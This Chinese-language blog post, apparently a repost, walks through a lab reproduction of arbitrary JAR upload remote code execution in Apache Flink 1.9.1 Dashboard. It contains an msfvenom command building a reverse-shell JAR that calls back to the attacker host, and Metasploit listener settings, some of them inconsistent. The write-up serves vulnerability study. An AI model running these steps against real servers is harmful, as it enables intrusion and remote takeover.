Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

发布时间:2021-12-31 10:57:38 作者:小新
来源:亿速云 阅读:243

这篇文章主要为大家展示了“Apache Flink任意Jar包上传致RCE漏洞复现的示例分析”,内容简而易懂,条理清晰,希望能够帮助大家解决疑惑,下面让小编带领大家一起研究并学习一下“Apache Flink任意Jar包上传致RCE漏洞复现的示例分析”这篇文章吧。

0x00简介

Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象

Apache Flink能用来做什么?

Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。基于流执行引擎,Flink提供了诸多更高抽象层的API以便用户编写分布式任务。

0x01漏洞介绍

攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的

0x02影响范围

至目前Apache Flink 1.9.1版本

0x03环境搭建

攻击机kali:192.168.10.147

受害机Ubuntu:192.168.10.176

测试环境:Flink 1.9.1 java8+

Apache Flink 1.9.1安装包下载:

https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

下载完成后使用解压

tar zxvf flink-1.9.1-bin-scala_2.11.tgz

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

进入bin目录运行./start-cluster.sh启动环境

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

环境搭建成功 目标站点 http://192.168.10.176:8081

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

0x04漏洞复现

使用kali生成jar后门包

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.10.147 LPORT=2020 -f jar > shell.jar

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

  1. 攻击机访问目标站点 并上传shell.jar

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

使用kali配置监听

use exploit/multi/handler

set payload java/shell/reverse_tcp

set RHOST 192.168.10.147

set LPORT 2020

run

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

点开刚刚上传的shell.jar,触发漏洞

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

Apache Flink任意Jar包上传致RCE漏洞复现的示例分析

0x05修复方式

更新官网补丁或更新最新版本

以上是“Apache Flink任意Jar包上传致RCE漏洞复现的示例分析”这篇文章的所有内容,感谢各位的阅读!相信大家都有了一定的了解,希望分享的内容对大家有所帮助,如果还想学习更多知识,欢迎关注亿速云行业资讯频道!

推荐阅读:
  1. Apache Flink中任意Jar包上传导致远程代码执行漏洞复现问题怎么办
  2. 如何进行Apache Flink 文件操作漏洞CVE-2020-17518及CVE-2020-17519的分析

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

rce漏洞 flink apache

上一篇:怎么为SAP Analytics Cloud的story创建持久化页面

下一篇:如何使用SAP云平台Mobile Service开发移动应用

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》